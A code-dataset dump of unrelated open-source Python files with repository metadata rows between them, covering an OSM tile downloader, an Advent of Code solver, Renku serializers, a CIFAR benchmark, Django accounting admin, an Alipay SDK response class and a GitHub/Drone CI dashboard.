    """ Downloads custom data from OSM inside administrative boundary geometry """
    @staticmethod
    def __boundary_filter(*args, **kw):
        """Build the generator the query builder expects for a boundary
        relation lookup; kwargs become exact k=v tag filters, positional
        args are passed through as raw filter dicts."""
        def main():
            query = [
                {"k": k, "v": "{}".format(v)} \
                for k,v in kw.items()]+list(args)
            yield {
                # "bbox": Bbox(minlon, minlat, maxlon, maxlat).osm,
                "query": [query],
                "gtypes": ['relation']
            }
        return main
    def __init__(self, name, admin_level=8, zoom=14):
        """
        name @string : Boundary name (e.g. Genova, Milano, etc.)
        admin_level @integer : Please refer to https://wiki.openstreetmap.org/wiki/Key:admin_level
            (e.g. 8 Comune or 6 Provincia)
        zoom @integer : Dimension of tiles used for pixelating the boundary
        """
        super(OsmShell, self).__init__()
        # The "wikipedia ~ it:" filter restricts matches to Italian
        # boundaries -- presumably intentional; confirm for other regions.
        query = Turbo.build_query(self.__boundary_filter(
            {"k": "wikipedia", "regv": "it:"},
            boundary = "administrative",
            admin_level = admin_level,
            name = name
        ))
        turbo = Turbo()
        # Raw Overpass call; the JSON response is converted to GeoJSON.
        data_, _ = turbo.__raw_call__(query.encode())
        data = json.loads(data_)
        fc = osm2geojson.json2geojson(data)
        polys = list(get_polys(fc))
        # Fail loudly when the boundary lookup matched nothing.
        assert len(polys)>0
        # Pixelate the boundary into slippy-map tiles at the given zoom.
        self.tiles = burn(polys, zoom)
    @property
    def tileCollection(self):
        """GeoJSON FeatureCollection of the covering tiles' footprints."""
        return geojson.FeatureCollection(list(map(
            lambda gg: geojson.Feature(geometry=gg),
            map(tile2poly, self.tiles)
        )))
    def __call__(self, query=None):
        """Download data tile by tile, using *query* as the Overpass filter."""
        if query is None:
            # Generic query for downloading everything
            query = [[{"k": "qwertyuiop", "modv": "not", "regv": "."},],]
        for tile in tqdm(self.tiles):
            dbsyncher = Syncher(*tile, query=query)
            dbsyncher()
| 30.649402 | 111 | 0.564929 |
795520b881b7da8f5dcfa058c1d4da6a931e396c | 1,254 | py | Python | Day4.1.py | m-berk/AdventOfCode2019 | 73a930fc24a726186364923fc0575c84e19176af | [
"MIT"
] | 1 | 2021-06-16T07:34:30.000Z | 2021-06-16T07:34:30.000Z | Day4.1.py | m-berk/AdventOfCode2019 | 73a930fc24a726186364923fc0575c84e19176af | [
"MIT"
] | null | null | null | Day4.1.py | m-berk/AdventOfCode2019 | 73a930fc24a726186364923fc0575c84e19176af | [
"MIT"
] | 2 | 2020-09-03T07:47:52.000Z | 2021-02-04T21:07:40.000Z |
def getNumb(Arr):
    """Combine a sequence of digits into the integer they spell.

    Generalized from the original fixed six-digit formula via Horner's
    rule, so it works for any length (e.g. [1, 2, 3] -> 123) while giving
    identical results for six-element input.
    """
    number = 0
    for digit in Arr:
        number = number * 10 + digit
    return number
rangeStart = 367479
rangeFinish = 893698


def is_valid_password(number):
    """Return True for a valid AoC 2019 day-4 (part 1) password.

    A password is valid when its decimal digits never decrease and at
    least one adjacent pair of digits is equal.
    """
    digits = str(number)
    pairs = list(zip(digits, digits[1:]))
    if any(a > b for a, b in pairs):
        return False
    return any(a == b for a, b in pairs)


def find_valid_passwords(start, finish):
    """Return all valid passwords in the inclusive range [start, finish]."""
    return [n for n in range(start, finish + 1) if is_valid_password(n)]


if __name__ == "__main__":
    # The original brute-forced six nested digit loops; scanning the numeric
    # range with the same validity rules is equivalent (results ascend in
    # both versions) and far simpler.  Output format is unchanged: the full
    # list of candidates, then their count.
    Results = find_valid_passwords(rangeStart, rangeFinish)
    print(Results)
    print(len(Results))
print(len(Results)) | 25.591837 | 78 | 0.455343 |
795520e3eee84953c12d47393ff3ccd2ce4092b9 | 8,261 | py | Python | renku/service/serializers/cache.py | almutlue/renku-python | 84b6d0f448161f33a3caa1b9631ae47840d648c6 | [
"Apache-2.0"
] | null | null | null | renku/service/serializers/cache.py | almutlue/renku-python | 84b6d0f448161f33a3caa1b9631ae47840d648c6 | [
"Apache-2.0"
] | null | null | null | renku/service/serializers/cache.py | almutlue/renku-python | 84b6d0f448161f33a3caa1b9631ae47840d648c6 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright 2020 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Renku service cache serializers."""
import time
import uuid
from datetime import datetime
from urllib.parse import urlparse
from marshmallow import Schema, ValidationError, fields, post_load, pre_load, validates
from werkzeug.utils import secure_filename
from renku.core.errors import ConfigurationError
from renku.core.models.git import GitURL
from renku.service.config import PROJECT_CLONE_DEPTH_DEFAULT
from renku.service.serializers.common import RenkuSyncSchema, RepositoryContext
from renku.service.serializers.rpc import JsonRPCResponse
def extract_file(request):
    """Pull the uploaded file out of a Flask request.

    :raises: `ValidationError` when the "file" part is missing or carries
        an empty filename.
    """
    uploaded_files = request.files
    if "file" not in uploaded_files:
        raise ValidationError("missing key: file")

    uploaded = uploaded_files["file"]
    if uploaded:
        if not uploaded.filename:
            raise ValidationError("wrong filename: {0}".format(uploaded.filename))
        # Strip anything dangerous (path separators etc.) from the name.
        uploaded.filename = secure_filename(uploaded.filename)

    return uploaded
class FileUploadRequest(Schema):
    """Request schema for file upload."""
    # Whether an existing file with the same path may be overwritten.
    override_existing = fields.Boolean(missing=False)
    # Whether archives should be unpacked after upload.
    unpack_archive = fields.Boolean(missing=False)
class FileUploadContext(Schema):
    """Context schema for file upload."""
    created_at = fields.DateTime(missing=datetime.utcnow)
    # Fresh hex id generated per upload (callable -> evaluated per load).
    file_id = fields.String(missing=lambda: uuid.uuid4().hex)
    content_type = fields.String(missing="unknown")
    file_name = fields.String(required=True)
    # measured in bytes (comes from stat() - st_size)
    file_size = fields.Integer(required=True)
    relative_path = fields.String(required=True)
    is_archive = fields.Boolean(missing=False)
    is_dir = fields.Boolean(required=True)
    unpack_archive = fields.Boolean(missing=False)
class FileUploadResponse(Schema):
    """Response schema for file upload."""
    files = fields.List(fields.Nested(FileUploadContext), required=True)
class FileUploadResponseRPC(JsonRPCResponse):
    """RPC response schema for file upload response."""
    result = fields.Nested(FileUploadResponse)
class FileListResponse(Schema):
    """Response schema for files listing."""
    files = fields.List(fields.Nested(FileUploadContext), required=True)
class FileListResponseRPC(JsonRPCResponse):
    """RPC response schema for files listing."""
    result = fields.Nested(FileListResponse)
class ProjectCloneRequest(Schema):
    """Request schema for project clone."""
    git_url = fields.String(required=True)
    # Shallow-clone depth; service default when omitted.
    depth = fields.Integer(missing=PROJECT_CLONE_DEPTH_DEFAULT)
    # Optional git ref (branch/tag/commit) to check out.
    ref = fields.String(missing=None)
class ProjectCloneContext(ProjectCloneRequest):
    """Context schema for project clone."""

    project_id = fields.String(missing=lambda: uuid.uuid4().hex)

    # measured in ms
    # Bug fix: the default must be a callable; the original evaluated
    # time.time() once at import, stamping every clone with the same time.
    timestamp = fields.Integer(missing=lambda: time.time() * 1e3)

    name = fields.String()
    fullname = fields.String()
    email = fields.String()
    owner = fields.String()
    token = fields.String()

    @validates("git_url")
    def validate_git_url(self, value):
        """Reject URLs that GitURL cannot parse."""
        try:
            GitURL.parse(value)
        except UnicodeError as e:
            raise ValidationError("`git_url` contains unsupported characters") from e
        except ConfigurationError as e:
            raise ValidationError("Invalid `git_url`") from e

    @pre_load()
    def set_owner_name(self, data, **kwargs):
        """Derive the owner and name fields from the git URL before load."""
        try:
            git_url = GitURL.parse(data["git_url"])
        except UnicodeError as e:
            raise ValidationError("`git_url` contains unsupported characters") from e
        except ConfigurationError as e:
            raise ValidationError("Invalid `git_url`") from e

        if git_url.owner is None:
            raise ValidationError("Invalid `git_url`")
        data["owner"] = git_url.owner

        if git_url.name is None:
            raise ValidationError("Invalid `git_url`")
        data["name"] = git_url.name

        return data

    def format_url(self, data):
        """Return the git URL with an oauth2 token embedded in the netloc."""
        git_url = urlparse(data["git_url"])
        url = "oauth2:{0}@{1}".format(data["token"], git_url.netloc)
        return git_url._replace(netloc=url).geturl()

    @post_load
    def finalize_data(self, data, **kwargs):
        """Attach the authenticated URL and normalise the clone depth."""
        data["url_with_auth"] = self.format_url(data)

        if not data["depth"]:
            # NOTE: In case of `depth=None` or `depth=0` we set to default depth.
            data["depth"] = PROJECT_CLONE_DEPTH_DEFAULT

        try:
            depth = int(data["depth"])
            if depth < 0:
                # NOTE: In case of `depth<0` we remove the depth limit.
                data["depth"] = None
        except ValueError:
            data["depth"] = PROJECT_CLONE_DEPTH_DEFAULT

        return data
class ProjectCloneResponse(Schema):
    """Response schema for project clone."""
    project_id = fields.String(required=True)
    git_url = fields.String(required=True)
    # True once the clone has been initialised as a Renku project.
    initialized = fields.Boolean(default=False)
class ProjectCloneResponseRPC(JsonRPCResponse):
    """RPC response schema for project clone response."""
    result = fields.Nested(ProjectCloneResponse)
class ProjectListResponse(Schema):
    """Response schema for project listing."""
    projects = fields.List(fields.Nested(ProjectCloneResponse), required=True)
class ProjectListResponseRPC(JsonRPCResponse):
    """RPC response schema for project listing."""
    result = fields.Nested(ProjectListResponse)
class ProjectMigrateRequest(RepositoryContext):
    """Request schema for project migrate."""
    force_template_update = fields.Boolean(default=False)
    skip_template_update = fields.Boolean(default=False)
    skip_docker_update = fields.Boolean(default=False)
    skip_migrations = fields.Boolean(default=False)
    @pre_load()
    def default_commit_message(self, data, **kwargs):
        """Fall back to a standard commit message when none is supplied."""
        if not data.get("commit_message"):
            data["commit_message"] = "service: renku migrate"
        return data
class ProjectMigrateResponse(RenkuSyncSchema):
    """Response schema for project migrate."""
    was_migrated = fields.Boolean()
    template_migrated = fields.Boolean()
    docker_migrated = fields.Boolean()
    # Human-readable progress/warning messages produced by the migration.
    messages = fields.List(fields.String)
class ProjectMigrateResponseRPC(JsonRPCResponse):
    """RPC response schema for project migrate."""
    result = fields.Nested(ProjectMigrateResponse)
class ProjectMigrationCheckRequest(Schema):
    """Request schema for project migration check."""
    project_id = fields.String()
    git_url = fields.String()
    branch = fields.String()
class ProjectMigrationCheckResponse(Schema):
    """Response schema for project migration check."""
    migration_required = fields.Boolean()
    template_update_possible = fields.Boolean()
    automated_template_update = fields.Boolean()
    current_template_version = fields.String(allow_none=True)
    latest_template_version = fields.String(allow_none=True)
    template_source = fields.String()
    template_ref = fields.String()
    template_id = fields.String()
    docker_update_possible = fields.Boolean()
    project_supported = fields.Boolean()
    project_version = fields.String()
    latest_version = fields.String()
class ProjectMigrationCheckResponseRPC(JsonRPCResponse):
    """RPC response schema for project migration check."""
    result = fields.Nested(ProjectMigrationCheckResponse)
| 30.596296 | 87 | 0.702094 |
795521a501638724f923e2b6927c56510c9ebf97 | 2,940 | py | Python | benchmark_params.py | adarsh-kr/CVModelsBenchmark | 85aeb76c7c796d86baa97e1272aea83d734665b5 | [
"MIT"
] | null | null | null | benchmark_params.py | adarsh-kr/CVModelsBenchmark | 85aeb76c7c796d86baa97e1272aea83d734665b5 | [
"MIT"
] | null | null | null | benchmark_params.py | adarsh-kr/CVModelsBenchmark | 85aeb76c7c796d86baa97e1272aea83d734665b5 | [
"MIT"
] | null | null | null | '''Train CIFAR10 with PyTorch.'''
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import torchvision.transforms as transforms
import os
import argparse
from models import *
from utils import progress_bar
import statistics
def count_parameters(model):
    """Return the number of trainable (requires_grad) scalars in *model*."""
    trainable = (p.numel() for p in model.parameters() if p.requires_grad)
    return sum(trainable)
# Command-line interface for the benchmark run.
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
parser.add_argument('--arch', help="which architecture to use")
parser.add_argument('--iters', default=100, type=int, help='iters')
# NOTE(review): help text says 'iters' but this flag is the batch size.
parser.add_argument('--batch_size', default=64, type=int, help='iters')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
best_acc = 0 # best test accuracy
start_epoch = 0 # start from epoch 0 or last checkpoint epoch
# Data
print('==> Preparing data..')
# Standard CIFAR-10 augmentation (crop + flip) and per-channel normalization.
transform_train = transforms.Compose([
    transforms.RandomCrop(32, padding=4),
    transforms.RandomHorizontalFlip(),
    transforms.ToTensor(),
    transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
    transforms.ToTensor(),
    transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = torchvision.datasets.CIFAR10(root='./data', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size, shuffle=True, num_workers=2)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=100, shuffle=False, num_workers=2)
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
# Model
print('==> Building model..')
# Select the architecture by name; the classes come from "from models import *".
if args.arch == "vgg19":
    net = VGG('VGG19')
elif args.arch == "vgg16":
    net = VGG('VGG16')
elif args.arch == "vgg11":
    net = VGG('VGG11')
elif args.arch == "resnet152":
    net = ResNet152()
elif args.arch == "resnet18":
    net = ResNet18()
elif args.arch == "resnet50":
    net = ResNet50()
elif args.arch == "resnet34":
    net = ResNet34()
elif args.arch == "resnet101":
    net = ResNet101()
elif args.arch == "googlenet":
    net = GoogLeNet()
elif args.arch == "alexnet":
    raise NotImplementedError
# NOTE(review): if --arch matches none of the branches above, "net" is never
# bound and the next line raises NameError instead of a helpful message.
net = net.to(device)
if device == 'cuda':
    net = torch.nn.DataParallel(net)
    cudnn.benchmark = True
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
# Count trainable parameters and append "<arch>,<count>" to the log file.
num_params = count_parameters(net)
out = ("{},{}".format(args.arch,num_params))
with open("models_num_params.txt", "a") as writer:
    writer.write(out+"\n")
| 30.625 | 108 | 0.707823 |
795521b0c9fb42d0a0805621d1b8668cd72ec501 | 3,171 | py | Python | stixy/accounting/admin.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | stixy/accounting/admin.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | 7 | 2021-03-19T03:10:21.000Z | 2021-09-22T19:00:19.000Z | stixy/accounting/admin.py | AnthonyKenny98/Stixy | 5d6dd38cc590d28dc98cca2737bbacf4f1ec69ba | [
"MIT"
] | null | null | null | """Admin Settings for Accounting App."""
from django.contrib import admin
from django.forms.models import BaseInlineFormSet
# Register your models here.
from .models import AccountClass, AccountGroup, \
Account, SubAccount, BankAccount, Transaction, Entry
from django.core.exceptions import ValidationError
class AccountClassAdmin(admin.ModelAdmin):
    """Admin settings for Account Class."""
    list_display = ['name', 'positive_entry']
class AccountGroupAdmin(admin.ModelAdmin):
    """Admin Settings for Account Group."""
    # "get_account_class" is a computed column (method below).
    list_display = ['name', 'get_account_class']
    def get_account_class(self, obj):
        """Get name of associated account class."""
        return obj.account_class.name
class AccountAdmin(admin.ModelAdmin):
    """Admin Settings for Account."""
    # "get_account_group" is a computed column (method below).
    list_display = ['code', 'name', 'get_account_group']
    def get_account_group(self, obj):
        """Get name of associated account group."""
        return obj.account_group.name
class SubAccountAdmin(admin.ModelAdmin):
    """Admin Settings for SubAccount."""
    list_display = ['code', 'name']
class BankAccountAdmin(admin.ModelAdmin):
    """Admin Settings for Bank Account."""
    list_display = ['number', 'name']
class EntryInlineFormSet(BaseInlineFormSet):
    """Formset enforcing double-entry rules on a transaction's entries."""
    def clean(self):
        """Validate the set of inline entries as a whole.

        Checks that each entry is debit-only or credit-only, that at least
        two entries exist, that total debits equal total credits, and that
        both totals equal the parent transaction's amount.
        """
        super(EntryInlineFormSet, self).clean()
        debits, credits = 0, 0
        entries = 0
        for form in self.forms:
            if not form.is_valid():
                return # other errors exist, so don't bother.
                # NOTE(review): this skips ALL cross-form balance checks as
                # soon as one form has field errors -- a "continue" would
                # validate the remaining forms instead; confirm intent.
            # Deleted forms are excluded from the totals.
            if form.cleaned_data and not form.cleaned_data.get('DELETE'):
                debits += form.cleaned_data['debit']
                credits += form.cleaned_data['credit']
                entries += 1
                # An entry must be purely a debit or purely a credit.
                if form.cleaned_data['debit'] != 0 and form.cleaned_data['credit'] != 0:
                    raise ValidationError((
                        'One of credits or debits must be equal to 0.'))
        # DO TOTAL INLINES CHECK
        if entries < 2:
            raise ValidationError(
                ('Each transaction requires a minimum of 2 entries'))
        if debits != credits:
            raise ValidationError((
                'Transaction Debits and Credits must balance.'))
        if debits != self.instance.amount:
            raise ValidationError((
                'Transaction amount must equal total debits and credits.'))
class EntryInline(admin.TabularInline):
    """Inline class for entry."""
    model = Entry
    # Double-entry bookkeeping requires at least one debit and one credit row.
    min_num = 2
    extra = 0
    # Enforces the debit/credit balance rules defined in EntryInlineFormSet.
    formset = EntryInlineFormSet
class TransactionAdmin(admin.ModelAdmin):
    """Admin settings for Transaction Class."""
    list_display = ['id', 'date', 'short_description', 'amount']
    # Entries are edited inline so their formset can validate the whole set.
    inlines = [EntryInline]
# Hook each model up to its customized admin; Entry uses the default ModelAdmin.
admin.site.register(AccountClass, AccountClassAdmin)
admin.site.register(AccountGroup, AccountGroupAdmin)
admin.site.register(Account, AccountAdmin)
admin.site.register(SubAccount, SubAccountAdmin)
admin.site.register(BankAccount, BankAccountAdmin)
admin.site.register(Transaction, TransactionAdmin)
admin.site.register(Entry)
| 29.915094 | 88 | 0.654998 |
795521d5f9db61a35305b69ed8d9c98546bf0698 | 394 | py | Python | onlinejudge/__about__.py | beet-aizu/api-client | 5d026051ac51477f29dc714e9f8a72f7a7f72ace | [
"MIT"
] | null | null | null | onlinejudge/__about__.py | beet-aizu/api-client | 5d026051ac51477f29dc714e9f8a72f7a7f72ace | [
"MIT"
] | null | null | null | onlinejudge/__about__.py | beet-aizu/api-client | 5d026051ac51477f29dc714e9f8a72f7a7f72ace | [
"MIT"
] | null | null | null | # Python Version: 3.x
# Package metadata, consumed by the build tooling and --version output.
__package_name__ = 'online-judge-api-client'
__author__ = 'Kimiyuki Onaka'
__email__ = 'kimiyuki95@gmail.com'
__license__ = 'MIT License'
__url__ = 'https://github.com/online-judge-tools/api-client'
# (major, minor, patch, release-level, serial)
__version_info__ = (10, 2, 0, 'final', 0)
# Dotted "major.minor.patch" string derived from the tuple above.
__version__ = '{}.{}.{}'.format(*__version_info__[:3])
__description__ = 'API client to develop tools for competitive programming'
| 39.4 | 75 | 0.748731 |
795523c3a9feb0baeab29cca34135f2ddfcf25e4 | 1,149 | py | Python | dedupe/tfidf.py | neozhangthe1/dedupe | aff99e6bd027291eecfb78eae08aa73877f4fff0 | [
"MIT"
] | null | null | null | dedupe/tfidf.py | neozhangthe1/dedupe | aff99e6bd027291eecfb78eae08aa73877f4fff0 | [
"MIT"
] | null | null | null | dedupe/tfidf.py | neozhangthe1/dedupe | aff99e6bd027291eecfb78eae08aa73877f4fff0 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
import functools
import itertools
import logging

from .index import CanopyIndex
logger = logging.getLogger(__name__)
class TfIdfIndex(object):
    """Searchable TF-IDF index over documents, backed by a CanopyIndex."""

    def __init__(self, stop_words=None):
        # Avoid the shared-mutable-default pitfall: build a fresh list per call.
        if stop_words is None:
            stop_words = []
        self._index = CanopyIndex(stop_words)
        # Lazily assign each new document a unique integer id, starting at 1.
        # functools.partial(next, counter) works on both Python 2 and 3,
        # replacing the fragile .next/.__next__ AttributeError probing.
        self._doc_to_id = collections.defaultdict(
            functools.partial(next, itertools.count(1)))
        self._parseTerms = self._index.lexicon.parseTerms

    def index(self, doc):
        """Add doc to the index, assigning it an id on first sight."""
        i = self._doc_to_id[doc]
        self._index.index_doc(i, doc)

    def unindex(self, doc):
        """Remove doc from the index and rebuild the search structures."""
        i = self._doc_to_id.pop(doc)
        self._index.unindex_doc(i)
        self.initSearch()

    def initSearch(self):
        """(Re)initialize the underlying index's search structures."""
        self._index.initSearch()

    def search(self, doc, threshold=0):
        """Return ids of indexed documents matching doc above threshold."""
        query_list = self._parseTerms(doc)
        if not query_list:
            return []
        return [center for _score, center
                in self._index.apply(query_list, threshold)]
| 25.533333 | 82 | 0.613577 |
795523efe2f0cd6c09760ff4c088a56a2154ba3c | 823 | py | Python | alipay/aop/api/response/AlipayAssetPointVoucherprodBenefittemplateOfflineResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/response/AlipayAssetPointVoucherprodBenefittemplateOfflineResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/response/AlipayAssetPointVoucherprodBenefittemplateOfflineResponse.py | antopen/alipay-sdk-python-all | 8e51c54409b9452f8d46c7bb10eea7c8f7e8d30c | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayAssetPointVoucherprodBenefittemplateOfflineResponse(AlipayResponse):
    """Response wrapper for the benefit-template offline API (generated SDK style)."""
    def __init__(self):
        super(AlipayAssetPointVoucherprodBenefittemplateOfflineResponse, self).__init__()
        # Backing field for the quick_recycle response attribute.
        self._quick_recycle = None
    @property
    def quick_recycle(self):
        # Value copied verbatim from the gateway response; semantics defined
        # by the Alipay API, not visible here.
        return self._quick_recycle
    @quick_recycle.setter
    def quick_recycle(self, value):
        self._quick_recycle = value
    def parse_response_content(self, response_content):
        """Populate fields from the dict parsed by the base class."""
        response = super(AlipayAssetPointVoucherprodBenefittemplateOfflineResponse, self).parse_response_content(response_content)
        if 'quick_recycle' in response:
            self.quick_recycle = response['quick_recycle']
| 31.653846 | 130 | 0.752126 |
79552494a25c942a8c5b6dba2804a5c162a8a297 | 145 | py | Python | FlaskApp/filters.py | tulare/FlaskSMS | e9b9261399a6c06e073555f9b708574a406a1931 | [
"MIT"
] | null | null | null | FlaskApp/filters.py | tulare/FlaskSMS | e9b9261399a6c06e073555f9b708574a406a1931 | [
"MIT"
] | null | null | null | FlaskApp/filters.py | tulare/FlaskSMS | e9b9261399a6c06e073555f9b708574a406a1931 | [
"MIT"
] | 1 | 2020-12-02T07:42:33.000Z | 2020-12-02T07:42:33.000Z | # -*- encoding: utf-8 -*-
from datetime import datetime
from . import app
@app.template_filter('now')
def f_now(s) :
    # Jinja filter: "{{ anything | now }}" renders the current timestamp.
    # The filtered value `s` is intentionally ignored.
    # NOTE(review): datetime.now() is naive local time — confirm UTC is not expected.
    return datetime.now()
| 16.111111 | 29 | 0.675862 |
795526808989e080a313c95b5258c7aaa4e2dcaf | 280 | py | Python | pydex/core/logger.py | KennedyPutraKusumo/py-DED | c5742c29cae66542960060f19d65b446d532b477 | [
"MIT"
] | 2 | 2020-05-19T14:06:41.000Z | 2021-09-09T16:11:53.000Z | pydex/core/logger.py | KennedyPutraKusumo/py-DED | c5742c29cae66542960060f19d65b446d532b477 | [
"MIT"
] | 2 | 2020-04-28T02:36:36.000Z | 2021-08-23T09:36:13.000Z | pydex/core/logger.py | KennedyPutraKusumo/py-DED | c5742c29cae66542960060f19d65b446d532b477 | [
"MIT"
] | 2 | 2020-10-10T18:43:27.000Z | 2020-11-22T19:41:05.000Z | import sys
class Logger(object):
    """Tee writer that mirrors everything written to it into a log file.

    Intended to be installed as ``sys.stdout = Logger(path)`` so subsequent
    ``print`` output is shown on the terminal and appended to ``file_path``.
    """

    def __init__(self, file_path):
        # Keep a reference to the real stdout so output stays visible.
        self.terminal = sys.stdout
        # Append mode: repeated runs accumulate into the same log file.
        self.log = open(file_path, "a")

    def write(self, message):
        self.terminal.write(message)
        self.log.write(message)

    def flush(self):
        # Previously a no-op, which could silently lose buffered log data at
        # interpreter exit; flush both underlying streams instead.
        self.terminal.flush()
        self.log.flush()

    def close(self):
        """Flush and close the log file (the real stdout is left open)."""
        self.flush()
        self.log.close()
| 18.666667 | 39 | 0.607143 |
79552722dbb8de896108c79732e3961101e1719f | 3,696 | py | Python | main/application.py | metworkbot/github_organization_dashboard | 34bd70187a2970241523ccbe65c7c6cd0b293fb1 | [
"BSD-3-Clause"
] | null | null | null | main/application.py | metworkbot/github_organization_dashboard | 34bd70187a2970241523ccbe65c7c6cd0b293fb1 | [
"BSD-3-Clause"
] | null | null | null | main/application.py | metworkbot/github_organization_dashboard | 34bd70187a2970241523ccbe65c7c6cd0b293fb1 | [
"BSD-3-Clause"
] | null | null | null | import os
import jinja2
import aiohttp_jinja2
import aiohttp_github_helpers as h
from aiohttp import web, ClientSession, BasicAuth, ClientTimeout
# Configuration is taken from the environment; a missing variable raises
# KeyError at import time, which fails fast on misconfiguration.
DRONE_SERVER = os.environ['DRONE_SERVER']
DRONE_TOKEN = os.environ['DRONE_TOKEN']
# GitHub topics selecting which repos appear on the dashboard.
TOPICS = ["integration-level-5", "integration-level-4", "integration-level-3",
          "integration-level-2", "integration-level-1"]
ORG = "metwork-framework"
# NOTE(review): handle() relies on "master" being processed last when it
# fills repo['master_sha'] — keep "master" at the end of this list.
BRANCHES = ["integration", "master"]
GITHUB_USER = os.environ['GITHUB_USER']
GITHUB_PASS = os.environ['GITHUB_PASS']
TIMEOUT = ClientTimeout(total=20)
AUTH = BasicAuth(GITHUB_USER, GITHUB_PASS)
TEMPLATES_DIR = os.path.join(os.environ['MFSERV_CURRENT_PLUGIN_DIR'], 'main',
                             'templates')
async def drone_get_latest_status(client_session, owner, repo, branch):
    """Return the latest push build of owner/repo on branch from Drone CI.

    :return: dict with keys "status", "number" and "url" for the first
        matching build, or None when the request fails, the payload is
        unusable, or no push build exists for the branch.
    """
    url = "%s/api/repos/%s/%s/builds" % (DRONE_SERVER, owner, repo)
    # Drone authentication: token is passed as a query parameter.
    params = {"token": DRONE_TOKEN}
    async with client_session.get(url, params=params) as r:
        if r.status != 200:
            return None
        try:
            builds = await r.json()
            # The first matching entry is treated as the latest build —
            # assumes the API returns builds newest-first; TODO confirm.
            for build in builds:
                if build['event'] != 'push':
                    continue
                if build['branch'] != branch:
                    continue
                return {"status": build['status'], "number": build['number'],
                        "url": "%s/%s/%s/%i" % (DRONE_SERVER, owner,
                                                repo, build['number'])}
        except Exception:
            # Best-effort: any malformed/unexpected payload degrades to
            # "no status" rather than breaking the whole dashboard.
            pass
    return None
async def handle(request):
    """Render the dashboard page: every org repo carrying a tracked topic,
    with the latest commit and Drone build status for each tracked branch.
    """
    async with ClientSession(auth=AUTH, timeout=TIMEOUT) as session:
        # Collect repository names for every tracked topic ("testrepo" excluded).
        ghrepos = []
        for topic in TOPICS:
            tmp = await h.github_get_org_repos_by_topic(session, ORG, [topic],
                                                        ["testrepo"])
            ghrepos = ghrepos + tmp
        # First pass: build the repo/branch structure, storing the not-yet-
        # awaited coroutines for each commit/status lookup.
        repos = []
        for repo in ghrepos:
            tmp = {"name": repo, "url": "https://github.com/%s/%s" %
                   (ORG, repo), "branches": []}
            for branch in BRANCHES:
                commit_future = h.github_get_latest_commit(session, ORG, repo,
                                                           branch)
                status_future = drone_get_latest_status(session, ORG, repo,
                                                        branch)
                tmp['branches'].append({
                    "name": branch,
                    "commit_future": commit_future,
                    "status_future": status_future,
                    "github_link": "https://github.com/%s/%s/tree/%s" %
                                   (ORG, repo, branch)
                })
            repos.append(tmp)
        # Second pass: await each pending lookup and flatten the results
        # into plain values the template can use.
        for repo in repos:
            for branch in repo['branches']:
                commit = await branch['commit_future']
                # NOTE(review): master_sha is overwritten on every branch
                # iteration; the final value is only correct because
                # "master" is last in BRANCHES — fragile if order changes.
                if branch['name'] == 'master' and commit:
                    repo['master_sha'] = commit[0][0:7]
                else:
                    repo['master_sha'] = None
                sha = None
                age = None
                if commit:
                    # commit[0] is the full sha (shortened to 7 chars),
                    # commit[1] is used as the commit age.
                    sha = commit[0][0:7]
                    age = commit[1]
                branch['sha'] = sha
                branch['age'] = age
                del(branch['commit_future'])
                status = await branch['status_future']
                branch['drone_status'] = status
                del(branch['status_future'])
        context = {"REPOS": repos, "BRANCHES": BRANCHES}
        response = aiohttp_jinja2.render_template('home.html', request, context)
        return response
# Application bootstrap: Jinja2 templating plus one catch-all GET route
# that renders the dashboard for any path.
app = web.Application(debug=False)
aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(TEMPLATES_DIR))
app.router.add_get('/{tail:.*}', handle)
| 40.615385 | 78 | 0.525162 |
795529827bc4dedd1815105a54c16b03c0516c67 | 5,089 | py | Python | apps/authentication/admin.py | Nicolaad/onlineweb4 | 5942eaf907d6824d5384147627def9edefdb9946 | [
"MIT"
] | null | null | null | apps/authentication/admin.py | Nicolaad/onlineweb4 | 5942eaf907d6824d5384147627def9edefdb9946 | [
"MIT"
